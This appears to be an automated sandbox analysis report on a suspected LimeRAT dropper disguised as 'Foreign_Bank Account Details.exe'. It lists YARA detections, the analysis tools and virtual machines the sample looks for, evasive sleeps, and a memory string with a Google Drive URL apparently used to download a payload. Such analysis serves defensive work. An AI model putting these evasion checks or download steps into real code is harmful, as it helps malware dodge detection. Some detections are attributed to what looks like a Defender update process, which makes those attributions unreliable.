Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected generic Shellcode Injector
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AntiVM3
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299055991.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18328153087.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18302210268.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332249196.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18309001390.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Windows Security Disabler
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1HKAWRUHCCVAKL722JOQS1BRIWJN1S8KSWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \MSTRACER.DLL
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL]
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp Binary or memory string: *.LOG.|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect Any.run
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4908 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe TID: 2016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe TID: 644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe TID: 4968 Thread sleep time: -30000s >= -30000s
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9947
Found dropped PE file which has not been started or loaded
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAzSubmit.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetoursCopyAccelerator.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\endpointdlp.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetoursCopyAccelerator.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetours.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSvc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCmdRun.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\NisSrv.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCmdRun.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCopyAccelerator.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\endpointdlp.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCopyAccelerator.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mpextms.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpEvMsg.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUpdate.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ProtectionManagement.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\DefenderCSP.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUxAgent.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpRtp.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpEng.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetours.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCommu.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ConfigSecurityPolicy.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDlpCmd.exe
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Thread delayed: delay time: 922337203685477
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: vmmemctl
